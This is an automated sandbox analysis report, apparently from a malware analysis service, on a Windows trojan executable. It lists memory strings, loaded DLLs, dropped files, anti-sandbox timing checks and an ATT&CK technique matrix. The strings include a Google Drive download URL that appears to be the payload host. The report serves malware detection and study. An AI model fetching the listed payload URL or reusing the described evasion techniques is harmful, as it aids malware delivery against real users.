      Source: fTSt7dc60O.exe, 00000008.00000003.1547334302.000000000721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadam
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloade
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadid
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadk
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadkq
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadl
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000002.2492233155.000000000721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadom
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadt
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadv
      Source: fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/wA
      Source: fTSt7dc60O.exe, 00000008.00000003.1835223566.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2069157679.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2322710276.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2429117505.0000000007240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: fTSt7dc60O.exe, 00000008.00000003.1524814992.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1478904188.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592710254.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1491048101.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1615874421.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071AC000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1627045021.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1686747969.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1502459793.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1547334302.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1479093375.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1570023481.0000000007236000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1513407431.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1535832337.00000000071F8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.000000000721F000.00000004.00000020.00020000.00000000.sdmp, 
fTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1513407431.00000000071F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: fTSt7dc60O.exe, 00000008.00000003.1524814992.000000000721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/
      Source: fTSt7dc60O.exe, 00000008.00000003.1547276568.0000000007239000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071AC000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592623794.00000000071F0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1710476317.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1569872660.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1580938893.0000000007236000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2241371856.0000000007239000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1674629095.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1580893533.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1535832337.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1524814992.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1478904188.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1592710254.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1491048101.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1615874421.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, 
fTSt7dc60O.exe, 00000008.00000003.2286306653.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.000000000721F000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1513407431.00000000071F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: fTSt7dc60O.exe, 00000008.00000003.1603353148.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1835223566.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2069157679.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2322710276.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2429117505.0000000007240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: fTSt7dc60O.exe, 00000008.00000003.1835223566.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2069157679.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2322710276.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2429117505.0000000007240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: fTSt7dc60O.exe, 00000008.00000003.1615859431.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1603353148.0000000007241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comuI(
      Source: fTSt7dc60O.exe, 00000008.00000003.1835223566.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2069157679.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2322710276.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2429117505.0000000007240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: fTSt7dc60O.exe, 00000008.00000003.1603353148.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1835223566.0000000007241000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2069157679.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2322710276.0000000007240000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2429117505.0000000007240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405331
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,8_2_0040335A
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00404B6E0_2_00404B6E
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040659D0_2_0040659D
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_00404B6E8_2_00404B6E
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_0040659D8_2_0040659D
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: String function: 00402B3A appears 51 times
      Source: fTSt7dc60O.exe, 00000000.00000000.1246875109.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs fTSt7dc60O.exe
      Source: fTSt7dc60O.exe, 00000008.00000000.1363150047.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs fTSt7dc60O.exe
      Source: fTSt7dc60O.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal68.troj.evad.winEXE@3/10@2/2
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404635
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile created: C:\Users\user\subacidity.lnkJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsd9393.tmpJump to behavior
      Source: fTSt7dc60O.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: fTSt7dc60O.exeVirustotal: Detection: 77%
      Source: fTSt7dc60O.exeReversingLabs: Detection: 66%
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile read: C:\Users\user\Desktop\fTSt7dc60O.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\fTSt7dc60O.exe "C:\Users\user\Desktop\fTSt7dc60O.exe"
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess created: C:\Users\user\Desktop\fTSt7dc60O.exe "C:\Users\user\Desktop\fTSt7dc60O.exe"
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess created: C:\Users\user\Desktop\fTSt7dc60O.exe "C:\Users\user\Desktop\fTSt7dc60O.exe"Jump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: subacidity.lnk.0.drLNK file: ..\..\Program Files (x86)\Common Files\cutline.sil
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
      Source: fTSt7dc60O.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      Source: Yara matchFile source: 00000000.00000002.1367001967.00000000055DB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2484621112.000000000219B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeFile created: C:\Users\user\AppData\Local\Temp\nsb9BB3.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\fTSt7dc60O.exeAPI/Special instruction interceptor: Address: 59A08B6
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeAPI/Special instruction interceptor: Address: 25608B6
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeRDTSC instruction interceptor: First address: 595C57D second address: 595C57D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF01474E232h 0x00000006 push edi 0x00000007 mov edi, 000000AEh 0x0000000c cmp edi, 1E8A5BDCh 0x00000012 jg 00007FF014793119h 0x00000018 pop edi 0x00000019 cmp dl, 0000006Eh 0x0000001c inc ebp 0x0000001d inc ebx 0x0000001e test cl, al 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeRDTSC instruction interceptor: First address: 251C57D second address: 251C57D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF014EF2832h 0x00000006 push edi 0x00000007 mov edi, 000000AEh 0x0000000c cmp edi, 1E8A5BDCh 0x00000012 jg 00007FF014F37719h 0x00000018 pop edi 0x00000019 cmp dl, 0000006Eh 0x0000001c inc ebp 0x0000001d inc ebx 0x0000001e test cl, al 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb9BB3.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\fTSt7dc60O.exe TID: 1836Thread sleep count: 43 > 30Jump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exe TID: 1836Thread sleep time: -430000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_00402770 FindFirstFileW,8_2_00402770
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_004057D0
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_0040628B FindFirstFileW,FindClose,8_2_0040628B
      Source: fTSt7dc60O.exe, 00000008.00000002.2492233155.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071AC000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1767051912.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2171579304.00000000071AC000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.1778836405.00000000071E0000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000002.2492233155.0000000007188000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000008.00000003.2286306653.00000000071E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeAPI call chain: ExitProcess graph end nodegraph_0-4755
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeAPI call chain: ExitProcess graph end nodegraph_0-4756
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeProcess created: C:\Users\user\Desktop\fTSt7dc60O.exe "C:\Users\user\Desktop\fTSt7dc60O.exe"Jump to behavior
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00405F6A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F6A
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 23 System Information Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
